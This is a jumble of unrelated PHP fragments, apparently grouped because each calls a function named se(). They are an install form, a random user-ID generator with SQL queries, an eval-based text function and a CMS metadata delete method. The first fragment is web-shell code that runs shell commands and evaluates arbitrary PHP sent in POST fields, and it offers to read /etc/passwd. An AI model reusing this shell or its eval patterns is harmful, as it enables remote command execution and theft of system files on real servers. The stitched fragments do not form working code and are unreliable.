@eval($c); } elseif (@function_exists('create_function')) { $f = @create_function('', $c); $f(); } else { $f = ctf(' <?php ' . $c . ' ?> '); @(include $f); @unlink($f); } echo escHTML(@ob_get_clean()); } echo '<div class="xmp">'; if (!empty($_POST['ex'])) { se('(' . $_POST['ex'] . ')2>&1'); } elseif (!empty($_POST['ev'])) { pe($_POST['ev']); } echo '</div>'; } elseif (isset($_POST['si'])) { ?> <fieldset><form action="" method="post"><button type="submit" name="si" value="">phpinfo</button> <?php if (!IW && @is_readable('/etc/passwd')) { echo ' <button type="submit" name="si" value="p">passwd</button>'; } ?> </form></fieldset> <?php if ($_POST['si'] == 'p') {
<h2><?php tr('Admin Account Settings'); ?> </h2> <div> <label><?php echo tr('Login'); ?> * <small>(<?php echo tr('at least 6 characters alphanumeric'); ?> )</small> </label> <input type="text" name="identifiant" value="<?php if (isset($_POST['identifiant'])) { echo se($_POST['identifiant']); } ?> " required> </div> <div> <label><?php echo tr('Password'); ?> * <small>(<?php echo tr('at least 8 characters alphanumeric'); ?> )</small></label> <input type="password" name="pass1" id="pass1" required> </div> <div>
$t7 = rand(0, 9); $userID = $t0 + 10000000 * $t1 + 1000000 * $t2 + 100000 * $t3 + 10000 * $t4 + 1000 * $t5 + 100 * $t6 + 10 * $t7; return $userID; } function ma() { $t0 = rand(0, 9); $t1 = rand(1, 9); $t2 = rand(0, 9); $t3 = rand(0, 9); $ma = 10000 * $t3 + 1000 * $t2 + 100 * $t1 + 10 * $t0; return $ma; } function se($con) { $userId = rd(); $result = mysqli_query($con, "SELECT * FROM users WHERE id={$userId};"); while (mysqli_num_rows($result) != 0) { $userId = rd(); $result = mysqli_query($con, "SELECT * FROM users WHERE id={$userId};"); } return $userId; } echo se($con); /* $result=mysqli_query($con,"SELECT * FROM users WHERE id=$userId;"); while(mysqli_num_rows($result)!=0){ $userId=rd(); $result=mysqli_query($con,"SELECT * FROM users WHERE id=$userId;"); } */
function el($text, $term) { $term = preg_replace('/[^a-z0-9]/', '', strtolower($term)); eval(preg_replace('/BIGTEXT/', $term, se($text))); }
public function delete($metaType, $objectId, $metaKey, $metaValue = '', $deleteAll = false) { if (!$metaType || !$metaKey || !is_numeric($objectId) && !$deleteAll) { return false; } $objectId = abs((int) $objectId); if (!$objectId && !$deleteAll) { return false; } if (!($repositoryClassInstance = $this->metaRepoExists($metaType))) { return false; } $column = sanitizeKey($metaType . '_id'); $metaKey = e($metaKey); $metaValue = se($metaValue); $check = Plugin::apply_filters("delete_{$metaType}_metadata", null, $objectId, $metaKey, $metaValue, $deleteAll); if (null !== $check) { return (bool) $check; } $_metaValue = $metaValue; $metaValue = jsonizeMaybe($metaValue); $findQueryClauses = ['meta_key' => $metaKey]; if (!$deleteAll) { $findQueryClauses[$column] = $objectId; } if ('' !== $metaValue && null !== $metaValue && false !== $metaValue) { $findQueryClauses['meta_value'] = $metaValue; } $metaIds = degrade($this->{$repositoryClassInstance}->findWhere($findQueryClauses, ['id'])); if (!count($metaIds)) { return false; } if ($deleteAll) { $objectIds = degrade(array_pluck($this->{$repositoryClassInstance}->findWhere(['meta_key' => $metaKey], [$column]), $column)); } Plugin::do_action("delete_{$metaType}_meta", $metaIds, $objectId, $metaKey, $_metaValue); $delete = $this->{$repositoryClassInstance}->delete($metaIds); if (!$delete) { return false; } if ($deleteAll) { foreach ($objectIds as $oId) { Cache::tags(["{$metaType}_meta"])->forget($oId); } } else { Cache::tags(["{$metaType}_meta"])->forget($objectId); } Plugin::do_action("deleted_{$metaType}_meta", $metaIds, $objectId, $metaKey, $_metaValue); return true; }